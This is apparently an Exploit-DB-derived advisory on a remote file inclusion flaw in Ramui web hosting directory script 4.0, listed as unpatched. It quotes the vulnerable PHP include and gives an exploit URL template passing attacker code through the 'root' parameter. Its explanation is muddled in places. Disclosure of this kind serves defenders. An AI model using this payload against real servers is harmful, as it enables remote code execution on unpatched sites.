Ramui web hosting directory script 4.0 Remote File Include Vulnerability

vendor:

Web Hosting Directory Script

by:

bd0rk

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: Web Hosting Directory Script

Affected Version From: 4.0

Affected Version To: 4.0

Patch Exists: NO

Related CWE: N/A

CPE: //a:ramui:web_hosting_directory_script:4.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Ramui web hosting directory script 4.0 Remote File Include Vulnerability

The $root-parameter is a __construct. But no value was passed to him. Therefore, nothing can be checked before include in line 13. So an attacker can execute malicious shellcode about it. In this case, the __construct is meaningless.

Mitigation:

Input validation should be done to prevent malicious code injection.

Source

Exploit-DB raw data:

# Title: Ramui web hosting directory script 4.0 Remote File Include Vulnerability
# Author: bd0rk
# Twitter: twitter.com/bd0rk
# Vendor: http://www.ramui.com
# Download: http://ramui.com/directory-script/download-v4.html

Proof-of-Concept:
/gb/include/connection.php lines 6-13 in php-sourcecode
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class connection
{
protected $site;
public $error=false;
protected $admin=false;
function __construct($root)
{
        include $root."database/config.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The $root-parameter is a __construct.
But no value was passed to him.
Therefore, nothing can be checked before include in line 13.
So an attacker can execute malicious shellcode about it.
In this case, the __construct is meaningless.


[+]Exploit: http://[server]/path/gb/include/connection.php?root=[YourShellcode]


~~Everything revolves. Even the planet. :)~~
***Greetz to ALL my followers on Twitter!***

/bd0rk